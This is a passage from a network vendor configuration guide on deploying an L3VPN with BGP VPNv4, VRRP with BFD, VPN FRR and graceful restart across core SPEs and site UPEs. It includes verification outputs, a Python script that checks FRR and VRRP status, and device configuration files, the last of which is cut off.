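Walking the Site1 tag set {100:100, 5720:5720, 12:12} through p_iBGP_RR_in shows that a /26 route is accepted by node 11 with preferred value 300, while a /32 host route carrying the same tags is dropped by node 5. The deny in node 5 only fires when both clauses match, so a /32 that arrives without the 5720:5720 community is accepted by node 11: the host-route filter depends on the UPEs tagging consistently, which is worth checking when a UPE's export policy is changed. Through core-import, any route tagged 12:12 is dropped at node 5 regardless of its other communities.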

Checking the Configuration


l Run the display bgp vpnv4 all peer command to check the BGP VPNv4 peer status.
Using Core_SPE1 as an example, if the value of State is Established, BGP peer
relationships have been set up successfully.
[Core_SPE1]display bgp vpnv4 all peer

 BGP local router ID : 172.16.0.5
 Local AS number : 65000
 Total number of peers : 4                 Peers in established state : 4

  Peer            V          AS  MsgRcvd  MsgSent  OutQ  Up/Down       State  PrefRcv

  172.16.2.51     4       65000     2102     1859     0  20:55:17  Established      550
  172.16.2.86     4       65000     3673     2989     0  0026h03m  Established      550
  172.16.0.3      4       65000     1659     1462     0  20:57:05  Established      200
  172.16.0.4      4       65000     3421     2494     0  0026h03m  Established      200

2.5.6.4 Configuring an L3VPN

Context
VPN instances must be configured so that VPNv4 routes can be advertised and data forwarded, which is what makes communication over an L3VPN possible.

Procedure
l Configure SPEs.
The following uses the configuration of Core_SPE1 on the core ring as an example. The
configurations of Core_SPE2 and Core_SPE3 are similar to the configuration of
Core_SPE1, and are not mentioned here.
ip vpn-instance vpna //Create a VPN instance.
ipv4-family
route-distinguisher 5:1 //Configure an RD.
tnl-policy TSel //Configure a TE tunnel for the VPN instance.
vpn-target 0:1 export-extcommunity //Configure the VPN target extended community attribute.
vpn-target 0:1 import-extcommunity
#
bgp 65000
#
ipv4-family vpnv4
nexthop recursive-lookup delay 10 //Set the next-hop iteration delay to 10s.
route-select delay 120 //Set the route selection delay to 120s, preventing traffic interruption caused by a fast route switchback.
#
ipv4-family vpn-instance vpna
default-route imported //Import the default route to VPN instance vpna.
nexthop recursive-lookup route-policy delay_policy //Configure BGP next-hop iteration based on the routing policy delay_policy.
nexthop recursive-lookup delay 10
route-select delay 120
#
route-policy delay_policy permit node 0 //Permit routes of all sites.
if-match community-filter all_site
#

l Configure UPEs.
The following uses the configuration of Site1_UPE1 as an example. The configurations
of Site1_UPE2, Site2_UPE3, Site2_UPE4, Site3_UPE5, and Site3_UPE6 are similar to
the configuration of Site1_UPE1, and are not mentioned here.
arp vlink-direct-route advertise //Advertise IPv4 ARP Vlink direct routes.
#
ip vpn-instance vpna
ipv4-family
route-distinguisher 1:1
tnl-policy TSel
arp vlink-direct-route advertise
vpn-target 0:1 export-extcommunity
vpn-target 0:1 import-extcommunity
#
interface XGigabitEthernet1/0/4
port link-type trunk
undo port trunk allow-pass vlan 1
#
interface XGigabitEthernet1/0/4.200
dot1q termination vid 200
ip binding vpn-instance vpna //Bind the VPN instance to the corresponding service interface.
arp direct-route enable //Configure the ARP module to report ARP Vlink direct routes to the RM module.
ip address 172.18.200.66 255.255.255.192
arp broadcast enable //Enable ARP broadcast on the VLAN tag termination sub-interface.
#
bgp 65000
#
ipv4-family vpnv4
route-select delay 120
#
ipv4-family vpn-instance vpna
default-route imported
import-route direct route-policy p_iBGP_RR_ex //Import direct routes into VPN instance vpna and add the community attributes.
route-select delay 120
#
#
route-policy p_iBGP_RR_ex permit node 0 //Add the community attributes to the route.
apply community 100:100 5720:5720 12:12
#
arp expire-time 62640 //Set the aging time of dynamic ARP entries.
arp static 172.18.200.68 0001-0002-0003 vid 200 interface XGigabitEthernet1/0/4.200 //Configure a static ARP entry.
#

----End

2.5.6.5 Configuring Reliability Protection

Configuration Roadmap
The configuration roadmap is as follows:

1. Deploy VRRP on two UPEs at a site to ensure reliability of uplink traffic on CEs. Site1
is used as an example, as shown in Figure 2-20.
– Configure Site1_UPE1 as the master and Site1_UPE2 as the backup in a VRRP group. If Site1_UPE1 fails, uplink traffic from CE1 is quickly switched to Site1_UPE2.
– Configure BFD for VRRP so that hardware-based BFD detects faults quickly. When a fault is detected, the hardware notifies the backup device in the VRRP group to switch to the Master state and directly sends gratuitous ARP packets so that access-layer devices forward traffic to the new master.
– Configure the backup device to forward service traffic. While its VRRP state is Backup, the device forwards any service traffic it receives. This prevents service traffic loss and shortens the service interruption if the aggregation device fails.
NOTE

If there are more than 64 VRRP groups, run the set vrrp max-group-number max-group-number
command on the UPEs to set the maximum number of allowed VRRP groups.

Figure 2-20 VRRP between two UPEs
[Figure not reproduced: CE1 (vpna) connects to Site1_UPE1 (VRRP Master) and Site1_UPE2 (VRRP Backup); a BFD session tracks the peer UPE, and the backup device is configured to forward service traffic upstream.]

2. Deploy VPN FRR on a UPE. If the TE tunnel between the UPE and one SPE is faulty, traffic is automatically switched to the TE tunnel between the UPE and the other SPE serving that site. Site1_UPE1 is used as an example, as shown in Figure 2-21.
Site1_UPE1 has two TE tunnels, to Core_SPE1 and Core_SPE2 respectively. Deploying VPN FRR on Site1_UPE1 ensures that traffic is quickly switched to Core_SPE2 if Core_SPE1 is faulty.

Figure 2-21 VPN FRR from an aggregation device to a core device
[Figure not reproduced: CE1 (vpna) connects to Site1_UPE1 and Site1_UPE2; from Site1_UPE1 the L3VPN primary path goes upstream to Core_SPE1 and the VPN FRR backup path to Core_SPE2.]

3. Deploy VPN FRR on an SPE, for example Core_SPE1. If Core_SPE2, which is connected to Core_SPE1, is faulty, Core_SPE1 switches VPN services to Core_SPE3, implementing fast end-to-end switchovers of VPN services, as shown in Figure 2-22.

Figure 2-22 VPN FRR between core devices
[Figure not reproduced: from Core_SPE1, the L3VPN primary path goes downstream to Core_SPE2 and the VPN FRR backup path to Core_SPE3.]

4. Deploy VPN FRR on an SPE. If the TE tunnel between the SPE and a UPE is faulty,
traffic is automatically switched to the TE tunnel between the SPE and another UPE at
the same site. Core_SPE2 is used as an example, as shown in Figure 2-23.
Core_SPE2 has two TE tunnels, to Site2_UPE3 and Site2_UPE4 respectively. Deploying VPN FRR on Core_SPE2 ensures that traffic is quickly switched to Site2_UPE4 if Site2_UPE3 is faulty.

Figure 2-23 VPN FRR from a core device to an aggregation device
[Figure not reproduced: from Core_SPE2 (with Core_SPE3 alongside), the L3VPN primary path goes downstream to Site2_UPE3 and the VPN FRR backup path to Site2_UPE4; both UPEs connect to CE2 (vpna).]

5. Deploy IP+VPN hybrid FRR on UPEs. If the interface of a UPE detects a fault on the
link between the UPE and its connected CE, the UPE quickly switches traffic to its peer
UPE, and the peer UPE then forwards the traffic to the CE. Site2 is used as an example,
as shown in Figure 2-24.
If the link from Site2_UPE3 to CE2 is faulty, traffic is forwarded to Site2_UPE4 through
an LSP and then to CE2 using a private IP address, improving network reliability.

Figure 2-24 Deployment of IP+VPN hybrid FRR on UPEs
[Figure not reproduced: if the link from Site2_UPE3 to CE2 fails, traffic takes the backup path over the LSP to Site2_UPE4 and then to CE2.]

6. Deploy VPN GR on all UPEs and SPEs to ensure uninterrupted VPN traffic forwarding
during a master/backup switchover on the device transmitting VPN services.

Procedure
l Configure SPEs.
The following uses the configuration of Core_SPE1 on the core ring as an example. The
configurations of Core_SPE2 and Core_SPE3 are similar to the configuration of
Core_SPE1, and are not mentioned here.
bgp 65000
graceful-restart //Enable BGP GR.
#
ipv4-family vpnv4
auto-frr //Enable VPNv4 FRR.
bestroute nexthop-resolved tunnel //Select a VPNv4 route only when its next hop is iterated to a tunnel, preventing packet loss during a revertive switchover.
#
ipv4-family vpn-instance vpna
auto-frr //Enable VPN auto FRR.
vpn-route cross multipath //Cross multiple VPNv4 routes to the same destination that carry different RDs (learned from different PEs) into the VPN instance, so that VPN FRR has a backup route to select.
#

l Configure UPEs.
The following uses the configuration of Site1_UPE1 as an example. The configurations
of Site1_UPE2, Site2_UPE3, Site2_UPE4, Site3_UPE5, and Site3_UPE6 are similar to
the configuration of Site1_UPE1, and are not mentioned here.
ip vpn-instance vpna
ipv4-family
ip frr route-policy mixfrr //Enable IP FRR.
#
interface XGigabitEthernet1/0/4.200
vrrp vrid 1 virtual-ip 172.18.200.65 //Configure VRRP.
vrrp vrid 1 preempt-mode timer delay 250 //Set the preemption delay of switches in the VRRP group.
vrrp vrid 1 track bfd-session 2200 peer //Enable BFD for VRRP to trigger master/backup switchovers.
vrrp vrid 1 backup-forward //Enable the backup device to forward service traffic.
vrrp track bfd gratuitous-arp send enable //Enable BFD for VRRP to quickly send gratuitous ARP packets during master/backup switchovers.
#
bfd vrrp-1 bind peer-ip 172.18.200.67 vpn-instance vpna interface XGigabitEthernet1/0/4.200 source-ip 172.18.200.66 //Configure static BFD for VRRP.
discriminator local 2200 //Set the local discriminator. The local discriminator of the local system must equal the remote discriminator configured on the remote system.
discriminator remote 1200 //Set the remote discriminator.
detect-multiplier 8 //Set the local BFD detection multiplier.
min-tx-interval 3 //Set the minimum interval at which the local device sends BFD packets to 3.3 ms.
min-rx-interval 3 //Set the minimum interval at which the local device receives BFD packets to 3.3 ms.
commit //Commit the BFD session configuration.
#
bgp 65000
graceful-restart
#
ipv4-family vpn-instance vpna
auto-frr
#
#
route-policy mixfrr permit node 0 //Set the backup next hop to LoopBack1 of the other UPE at the same site.
apply backup-nexthop 172.16.2.50
#

----End

Checking the Configuration


l Run the display ip routing-table vpn-instance command on SPEs to check the VPN FRR status from SPEs to UPEs.
The command output on Core_SPE2 is used as an example. The BkNextHop, BkInterface, BkLabel and BkPETunnelID fields give the backup next hop, backup interface, backup label and backup tunnel ID. Their presence shows that the VPN FRR entry from Core_SPE2 to the Site2 UPEs has been generated: the primary path is over Tunnel111 to 172.16.2.75 (Site2_UPE3) and the backup path over Tunnel121 to 172.16.2.76 (Site2_UPE4).
[Core_SPE2]display ip routing-table vpn-instance vpna 172.18.150.4 verbose
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Table : 1
Summary Count : 1

Destination: 172.18.150.0/26
Protocol: IBGP Process ID: 0
Preference: 255 Cost: 0
NextHop: 172.16.2.75 Neighbour: 172.16.2.75
State: Active Adv Relied Age: 21h55m50s
Tag: 0 Priority: low
Label: 1025 QoSInfo: 0x0
IndirectID: 0x185
RelayNextHop: 0.0.0.0 Interface: Tunnel111
TunnelID: 0x2 Flags: RD
BkNextHop: 172.16.2.76 BkInterface: Tunnel121
BkLabel: 1024 SecTunnelID: 0x0
BkPETunnelID: 0x3 BkPESecTunnelID: 0x0
BkIndirectID: 0xd

l Run the display ip routing-table vpn-instance command on UPEs to check the hybrid FRR status.
The command output on Site2_UPE3 is used as an example. The BkNextHop, BkInterface and BkLabel fields give the backup next hop, backup interface and backup label, showing that the hybrid FRR entry has been generated: the primary route to 172.18.150.4 is the Direct route through the local sub-interface XGigabitEthernet0/0/2.150, and the backup route is the IBGP route through 172.16.2.76, the other UPE at the same site (Site2_UPE4), reached over the LSP.
[Site2_UPE3]display ip routing-table vpn-instance vpna 172.18.150.4 verbose
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Table : 1
Summary Count : 2

Destination: 172.18.150.4/32
Protocol: Direct Process ID: 0
Preference: 0 Cost: 0
NextHop: 172.18.150.4 Neighbour: 0.0.0.0
State: Active Adv Age: 1d02h36m21s
Tag: 0 Priority: high
Label: NULL QoSInfo: 0x0
IndirectID: 0x0
RelayNextHop: 0.0.0.0 Interface: XGigabitEthernet0/0/2.150
TunnelID: 0x0 Flags: D
BkNextHop: 172.16.2.76 BkInterface: XGigabitEthernet0/0/4
BkLabel: 1024 SecTunnelID: 0x0
BkPETunnelID: 0x4800001b BkPESecTunnelID: 0x0
BkIndirectID: 0x0

Destination: 172.18.150.4/32
Protocol: IBGP Process ID: 0
Preference: 255 Cost: 0
NextHop: 172.16.2.76 Neighbour: 172.16.2.76
State: Inactive Adv Relied Age: 1d02h36m21s
Tag: 0 Priority: low
Label: 1024 QoSInfo: 0x0
IndirectID: 0xcd
RelayNextHop: 172.16.8.181 Interface: XGigabitEthernet0/0/4
TunnelID: 0x4800001b Flags: R

l Run the display vrrp interface command to check the VRRP status.
The command output on Site2_UPE3 is used as an example. State : Master shows that Site2_UPE3 is the VRRP master, Backup-forward : enabled shows that the backup device is configured to forward service traffic, and Track BFD : 1150 type: peer together with BFD-session state : UP shows that BFD for VRRP has been configured and the session is up.
[Site2_UPE3]display vrrp interface XGigabitEthernet0/0/2.150
XGigabitEthernet0/0/2.150 | Virtual Router 1
State : Master
Virtual IP : 172.18.150.1
Master IP : 172.18.150.2
PriorityRun : 100
PriorityConfig : 100
MasterPriority : 100
Preempt : YES Delay Time : 250 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : enabled
Track BFD : 1150 type: peer
BFD-session state : UP
Create time : 2016-05-21 11:02:27
Last change time : 2016-05-21 11:02:55
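
The three checks above can be automated from the same command outputs. The following Python script is an added example, not Huawei code: it parses the verbose VPN routing-table output into one record per Destination block and reports the FRR backup (BkNextHop, BkInterface, BkLabel) when one is installed, and it parses the VRRP output and compares State, Backup-forward and the tracked BFD session with what this section configures. The sample text inside is copied from the outputs shown on this page, trimmed to the lines the checks use; the parsers assume the "Key: value Key: value" layout of those outputs, with Process ID as the only two-word key. The script also reports the Auth type field, which is NONE in the page's output, so that the unauthenticated VRRP group is visible to whoever reviews the check.

```python
"""Parse the verification output used in this section and check it.

Added example, not Huawei code. The parsers follow the field layout of the
display outputs reproduced on this page; the sample text below is copied from
those outputs and trimmed to the lines the checks need.
"""
import re

# display ip routing-table vpn-instance vpna 172.18.150.4 verbose on Core_SPE2
SPE2_ROUTES = """\
Route Flags: R - relay, D - download to fib
Summary Count : 1

Destination: 172.18.150.0/26
Protocol: IBGP Process ID: 0
NextHop: 172.16.2.75 Neighbour: 172.16.2.75
State: Active Adv Relied Age: 21h55m50s
RelayNextHop: 0.0.0.0 Interface: Tunnel111
TunnelID: 0x2 Flags: RD
BkNextHop: 172.16.2.76 BkInterface: Tunnel121
BkLabel: 1024 SecTunnelID: 0x0
BkPETunnelID: 0x3 BkPESecTunnelID: 0x0
"""

# Same command on Site2_UPE3: direct route with hybrid FRR backup, then the inactive IBGP route.
UPE3_ROUTES = """\
Destination: 172.18.150.4/32
Protocol: Direct Process ID: 0
NextHop: 172.18.150.4 Neighbour: 0.0.0.0
State: Active Adv Age: 1d02h36m21s
RelayNextHop: 0.0.0.0 Interface: XGigabitEthernet0/0/2.150
TunnelID: 0x0 Flags: D
BkNextHop: 172.16.2.76 BkInterface: XGigabitEthernet0/0/4
BkLabel: 1024 SecTunnelID: 0x0

Destination: 172.18.150.4/32
Protocol: IBGP Process ID: 0
NextHop: 172.16.2.76 Neighbour: 172.16.2.76
State: Inactive Adv Relied Age: 1d02h36m21s
RelayNextHop: 172.16.8.181 Interface: XGigabitEthernet0/0/4
TunnelID: 0x4800001b Flags: R
"""

# display vrrp interface XGigabitEthernet0/0/2.150 on Site2_UPE3
UPE3_VRRP = """\
XGigabitEthernet0/0/2.150 | Virtual Router 1
State : Master
Preempt : YES Delay Time : 250 s
Auth type : NONE
Backup-forward : enabled
Track BFD : 1150 type: peer
BFD-session state : UP
"""

# "Key: value Key: value" pairs on one line; "Process ID" is the one two-word key.
FIELD = re.compile(r"(Process ID|[A-Za-z]+): (.*?)(?=\s+(?:Process ID|[A-Za-z]+):|$)")


def parse_route_entries(text):
    """Split verbose routing-table output into one dict per Destination block."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Destination:"):
            cur = {}                        # header lines before the first block are skipped
            entries.append(cur)
        if cur is not None and line:
            cur.update(FIELD.findall(line))
    return entries


def frr_backup(entry):
    """Return (backup next hop, backup interface, backup label), or None without an FRR backup."""
    nh = entry.get("BkNextHop")
    if not nh or nh == "0.0.0.0":
        return None
    return nh, entry.get("BkInterface"), entry.get("BkLabel")


def parse_vrrp(text):
    """Turn 'Name : value' lines into a dict; only the first ' : ' splits, the rest stays in the value."""
    fields = {}
    for line in text.splitlines():
        if " : " in line:
            key, value = line.split(" : ", 1)
            fields[key.strip()] = value.strip()
    return fields


def vrrp_findings(fields, expected_state="Master"):
    """Compare the VRRP output with this section's configuration; return the deviations found."""
    findings = []
    if fields.get("State") != expected_state:
        findings.append(f"state is {fields.get('State')}, expected {expected_state}")
    if fields.get("Backup-forward") != "enabled":
        findings.append("backup-forward is not enabled")
    if "Track BFD" not in fields:
        findings.append("no BFD session is tracked")
    elif fields.get("BFD-session state") != "UP":
        findings.append("tracked BFD session is not UP")
    if fields.get("Auth type", "NONE") == "NONE":
        findings.append("Auth type is NONE")   # reported as seen; the page configures no VRRP authentication
    return findings
```

Run against the page's outputs, frr_backup() returns ("172.16.2.76", "Tunnel121", "1024") for the Core_SPE2 entry and ("172.16.2.76", "XGigabitEthernet0/0/4", "1024") for the active Direct route on Site2_UPE3, and None for the inactive IBGP route, which is the backup itself and carries no Bk fields. vrrp_findings() returns only the Auth type note for the Site2_UPE3 output; on the backup UPE the same function is called with expected_state="Backup".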

2.5.7 Configuration Files

2.5.7.1 Core_SPE1 Configuration File

sysname Core_SPE1
#
router id 172.16.0.5
#
stp disable
#
ip vpn-instance vpna
ipv4-family
route-distinguisher 5:1
tnl-policy TSel
vpn-target 0:1 export-extcommunity
vpn-target 0:1 import-extcommunity
#
tunnel-selector TSel permit node 9
if-match ip next-hop ip-prefix core_nhp
#
tunnel-selector TSel permit node 10
apply tunnel-policy TE
#
bfd
#
mpls lsr-id 172.16.0.5
mpls
mpls te
label advertise non-null
mpls rsvp-te
mpls rsvp-te hello
mpls rsvp-te hello full-gr
mpls te cspf
#
mpls ldp
graceful-restart
#
load-balance-profile CUSTOM
ipv6 field l4-sport l4-dport
ipv4 field l4-sport l4-dport
#
interface Eth-Trunk4
undo portswitch
description Core_SPE1 to Core_SPE2
ip address 172.17.4.8 255.255.255.254
ospf network-type p2p
ospf ldp-sync
ospf timer ldp-sync hold-down 20
mpls
mpls te
mpls te link administrative group c
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
least active-linknumber 4
load-balance enhanced profile CUSTOM
#
interface Eth-Trunk5
undo portswitch
description Core_SPE1 to Core_SPE3
ip address 172.17.4.2 255.255.255.254
ospf network-type p2p
ospf ldp-sync
ospf timer ldp-sync hold-down 20
mpls
mpls te
mpls te link administrative group 30
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
least active-linknumber 4
load-balance enhanced profile CUSTOM
#
interface Eth-Trunk17
undo portswitch
description Core_SPE1 to Site1_UPE1
ip address 172.17.4.10 255.255.255.254
ospf network-type p2p
ospf ldp-sync
ospf timer ldp-sync hold-down 20
mpls
mpls te
mpls te link administrative group 4
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
least active-linknumber 4
load-balance enhanced profile CUSTOM
#
interface XGigabitEthernet1/0/0
eth-trunk 5
#
interface XGigabitEthernet1/0/1
eth-trunk 5
#
interface XGigabitEthernet1/0/2
eth-trunk 5
#
interface XGigabitEthernet1/0/3
eth-trunk 5
#
interface XGigabitEthernet5/0/4
eth-trunk 4
#
interface XGigabitEthernet5/0/5
eth-trunk 4
#
interface XGigabitEthernet5/0/6
eth-trunk 4
#
interface XGigabitEthernet5/0/7
eth-trunk 4
#
interface XGigabitEthernet6/0/0
eth-trunk 17
#
interface XGigabitEthernet6/0/1
eth-trunk 17
#
interface XGigabitEthernet6/0/2
eth-trunk 17
#
interface XGigabitEthernet6/0/3
eth-trunk 17
#
interface XGigabitEthernet6/0/4
undo portswitch
description Core_SPE1 to Site3_UPE6
ip address 172.17.10.2 255.255.255.254
ospf network-type p2p
ospf ldp-sync
ospf timer ldp-sync hold-down 20
mpls
mpls te
mpls te link administrative group 20
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
#
interface LoopBack1
description ** GRT Management Loopback **
ip address 172.16.0.5 255.255.255.255
#
interface Tunnel611
description Core_SPE1 to Site1_UPE1
ip address unnumbered interface LoopBack1
tunnel-protocol mpls te
destination 172.16.2.51
mpls te tunnel-id 71
mpls te record-route
mpls te affinity property 4 mask 4
mpls te affinity property 8 mask 8 secondary
mpls te backup hot-standby
mpls te commit
#
interface Tunnel622
description Core_SPE1 to Site1_UPE2
ip address unnumbered interface LoopBack1
tunnel-protocol mpls te
destination 172.16.2.50
mpls te tunnel-id 82
mpls te record-route
mpls te affinity property 8 mask 8
mpls te affinity property 4 mask 4 secondary
mpls te backup hot-standby
mpls te commit
#
interface Tunnel711
description Core_SPE1 to Site3_UPE6
ip address unnumbered interface LoopBack1
tunnel-protocol mpls te
destination 172.16.2.86
mpls te tunnel-id 311
mpls te record-route
mpls te affinity property 20 mask 20
mpls te affinity property 10 mask 10 secondary
mpls te backup hot-standby
mpls te commit
#
interface Tunnel721
description Core_SPE1 to Site3_UPE5
ip address unnumbered interface LoopBack1
tunnel-protocol mpls te
destination 172.16.2.87
mpls te tunnel-id 312
mpls te record-route
mpls te affinity property 10 mask 10
mpls te affinity property 20 mask 20 secondary
mpls te backup hot-standby
mpls te commit
#
bgp 65000
graceful-restart
group devCore internal
peer devCore connect-interface LoopBack1
peer 172.16.0.3 as-number 65000
peer 172.16.0.3 group devCore
peer 172.16.0.4 as-number 65000
peer 172.16.0.4 group devCore
group devHost internal
peer devHost connect-interface LoopBack1
peer 172.16.2.50 as-number 65000
peer 172.16.2.50 group devHost
peer 172.16.2.51 as-number 65000
peer 172.16.2.51 group devHost
peer 172.16.2.86 as-number 65000
peer 172.16.2.86 group devHost
peer 172.16.2.87 as-number 65000
peer 172.16.2.87 group devHost
#
ipv4-family unicast
undo synchronization
undo peer devCore enable
undo peer devHost enable
undo peer 172.16.2.50 enable
undo peer 172.16.2.51 enable
undo peer 172.16.0.3 enable
undo peer 172.16.0.4 enable
undo peer 172.16.2.86 enable
undo peer 172.16.2.87 enable
#
ipv4-family vpnv4
policy vpn-target
auto-frr
nexthop recursive-lookup delay 10
tunnel-selector TSel
bestroute nexthop-resolved tunnel
route-select delay 120
peer devCore enable
peer devCore route-policy core-import import
peer devCore advertise-community
peer 172.16.0.3 enable
peer 172.16.0.3 group devCore
peer 172.16.0.4 enable
peer 172.16.0.4 group devCore
peer devHost enable
peer devHost route-policy p_iBGP_RR_in import
peer devHost advertise-community
peer devHost upe
peer devHost default-originate vpn-instance vpna
peer 172.16.2.50 enable
peer 172.16.2.50 group devHost
peer 172.16.2.51 enable
peer 172.16.2.51 group devHost
peer 172.16.2.86 enable
peer 172.16.2.86 group devHost
peer 172.16.2.87 enable
peer 172.16.2.87 group devHost
#
ipv4-family vpn-instance vpna
default-route imported
auto-frr
nexthop recursive-lookup route-policy delay_policy
nexthop recursive-lookup delay 10
vpn-route cross multipath
route-select delay 120
#
ospf 1
silent-interface all
undo silent-interface Eth-Trunk4
undo silent-interface Eth-Trunk5
undo silent-interface Eth-Trunk17
undo silent-interface XGigabitEthernet6/0/4
spf-schedule-interval millisecond 10
lsa-originate-interval 0
lsa-arrival-interval 0
opaque-capability enable
graceful-restart period 600
flooding-control
area 0.0.0.0
authentication-mode md5 1 cipher %^%#NInJJ<oF9VXb:BS~~9+JT'suROXkVHNG@8+*3FyB%^%#
network 172.16.0.5 0.0.0.0
network 172.17.4.2 0.0.0.0
network 172.17.4.8 0.0.0.0
network 172.17.4.10 0.0.0.0
network 172.17.10.2 0.0.0.0
mpls-te enable
#
route-policy delay_policy permit node 0
if-match community-filter all_site
#
route-policy p_iBGP_RR_in deny node 5
if-match ip-prefix deny_host
if-match community-filter all_site
#
route-policy p_iBGP_RR_in permit node 11
if-match community-filter site1
apply preferred-value 300
#
route-policy p_iBGP_RR_in permit node 12
if-match community-filter site2
apply preferred-value 200
#
route-policy p_iBGP_RR_in permit node 13
if-match community-filter site3
apply preferred-value 200
#
route-policy p_iBGP_RR_in permit node 20
#
route-policy core-import deny node 5
if-match community-filter site12
#
route-policy core-import deny node 6
if-match community-filter site13
#
route-policy core-import permit node 10
#
ip ip-prefix deny_host index 10 permit 0.0.0.0 0 greater-equal 32 less-equal 32
ip ip-prefix core_nhp index 10 permit 172.16.0.3 32
ip ip-prefix core_nhp index 20 permit 172.16.0.4 32
#
ip community-filter basic site1 permit 100:100
ip community-filter basic site2 permit 200:200
ip community-filter basic site3 permit 300:300
ip community-filter basic all_site permit 5720:5720
ip community-filter basic site12 permit 12:12
ip community-filter basic site13 permit 13:13
#
tunnel-policy TSel
tunnel select-seq cr-lsp lsp load-balance-number 1
#
tunnel-policy TE
tunnel select-seq cr-lsp load-balance-number 1
#
bfd SPE1toSPE2 bind ldp-lsp peer-ip 172.16.0.3 nexthop 172.17.4.9 interface Eth-Trunk4
discriminator local 317
discriminator remote 137
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE1toSPE3 bind ldp-lsp peer-ip 172.16.0.4 nexthop 172.17.4.3 interface Eth-Trunk5
discriminator local 32
discriminator remote 23
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE1toUPE1_b bind mpls-te interface Tunnel611 te-lsp backup
discriminator local 6116
discriminator remote 6115
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE1toUPE1_m bind mpls-te interface Tunnel611 te-lsp
discriminator local 6112
discriminator remote 6111
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE1toUPE2_b bind mpls-te interface Tunnel622 te-lsp backup
discriminator local 6226
discriminator remote 6225
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE1toUPE2_m bind mpls-te interface Tunnel622 te-lsp
discriminator local 6222
discriminator remote 6221
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE1toUPE5_b bind mpls-te interface Tunnel721 te-lsp backup
discriminator local 7216
discriminator remote 7215
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE1toUPE5_m bind mpls-te interface Tunnel721 te-lsp
discriminator local 7212
discriminator remote 7211
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE1toUPE6_b bind mpls-te interface Tunnel711 te-lsp backup
discriminator local 7116
discriminator remote 7115
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE1toUPE6_m bind mpls-te interface Tunnel711 te-lsp
discriminator local 7112
discriminator remote 7111
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
return

2.5.7.2 Core_SPE2 Configuration File

sysname Core_SPE2
#
router id 172.16.0.3
#
stp disable
#
ip vpn-instance vpna
ipv4-family
route-distinguisher 3:1
tnl-policy TSel
vpn-target 0:1 export-extcommunity
vpn-target 0:1 import-extcommunity
#
tunnel-selector TSel permit node 9
if-match ip next-hop ip-prefix core_nhp
#
tunnel-selector TSel permit node 10
apply tunnel-policy TE
#
bfd
#
mpls lsr-id 172.16.0.3
mpls
mpls te
label advertise non-null
mpls rsvp-te
mpls rsvp-te hello
mpls rsvp-te hello full-gr
mpls te cspf
#
mpls ldp
graceful-restart
#
load-balance-profile CUSTOM
ipv6 field l4-sport l4-dport
ipv4 field l4-sport l4-dport
#
interface Eth-Trunk2
undo portswitch
description Core_SPE2 to Core_SPE3
ip address 172.17.4.0 255.255.255.254
ospf network-type p2p
ospf ldp-sync
ospf timer ldp-sync hold-down 20
mpls
mpls te
mpls te link administrative group 3
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
least active-linknumber 4
load-balance enhanced profile CUSTOM
#
interface Eth-Trunk4
undo portswitch
description Core_SPE2 to Core_SPE1
ip address 172.17.4.9 255.255.255.254
ospf network-type p2p
ospf ldp-sync
ospf timer ldp-sync hold-down 20
mpls
mpls te
mpls te link administrative group c
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
least active-linknumber 4
load-balance enhanced profile CUSTOM
#
interface Eth-Trunk17
undo portswitch
description Core_SPE2 to Site1_UPE2
ip address 172.17.4.12 255.255.255.254
ospf network-type p2p
ospf ldp-sync
ospf timer ldp-sync hold-down 20
mpls
mpls te
mpls te link administrative group 8
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
least active-linknumber 4
load-balance enhanced profile CUSTOM
#
interface XGigabitEthernet3/0/4
eth-trunk 2
#
interface XGigabitEthernet3/0/5
eth-trunk 2
#
interface XGigabitEthernet3/0/6
eth-trunk 2
#
interface XGigabitEthernet3/0/7
eth-trunk 2
#
interface XGigabitEthernet5/0/0
eth-trunk 17
#
interface XGigabitEthernet5/0/1
eth-trunk 17
#
interface XGigabitEthernet5/0/2
eth-trunk 17
#
interface XGigabitEthernet5/0/3
eth-trunk 17
#
interface XGigabitEthernet5/0/5
undo portswitch
description Core_SPE2 to Site2_UPE3
ip address 172.16.8.178 255.255.255.254
ospf network-type p2p
ospf ldp-sync
ospf timer ldp-sync hold-down 20
mpls
mpls te
mpls te link administrative group 1
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
#
interface XGigabitEthernet6/0/4
eth-trunk 4
#
interface XGigabitEthernet6/0/5
eth-trunk 4
#
interface XGigabitEthernet6/0/6
eth-trunk 4
#
interface XGigabitEthernet6/0/7
eth-trunk 4
#
interface LoopBack1
description ** GRT Management Loopback **
ip address 172.16.0.3 255.255.255.255
#
interface Tunnel111
description Core_SPE2 to Site2_UPE3
ip address unnumbered interface LoopBack1
tunnel-protocol mpls te
destination 172.16.2.75
mpls te tunnel-id 111
mpls te record-route
mpls te affinity property 1 mask 1
mpls te affinity property 2 mask 2 secondary
mpls te backup hot-standby
mpls te commit
#
interface Tunnel121
description Core_SPE2 to Site2_UPE4
ip address unnumbered interface LoopBack1
tunnel-protocol mpls te
destination 172.16.2.76
mpls te tunnel-id 121
mpls te record-route
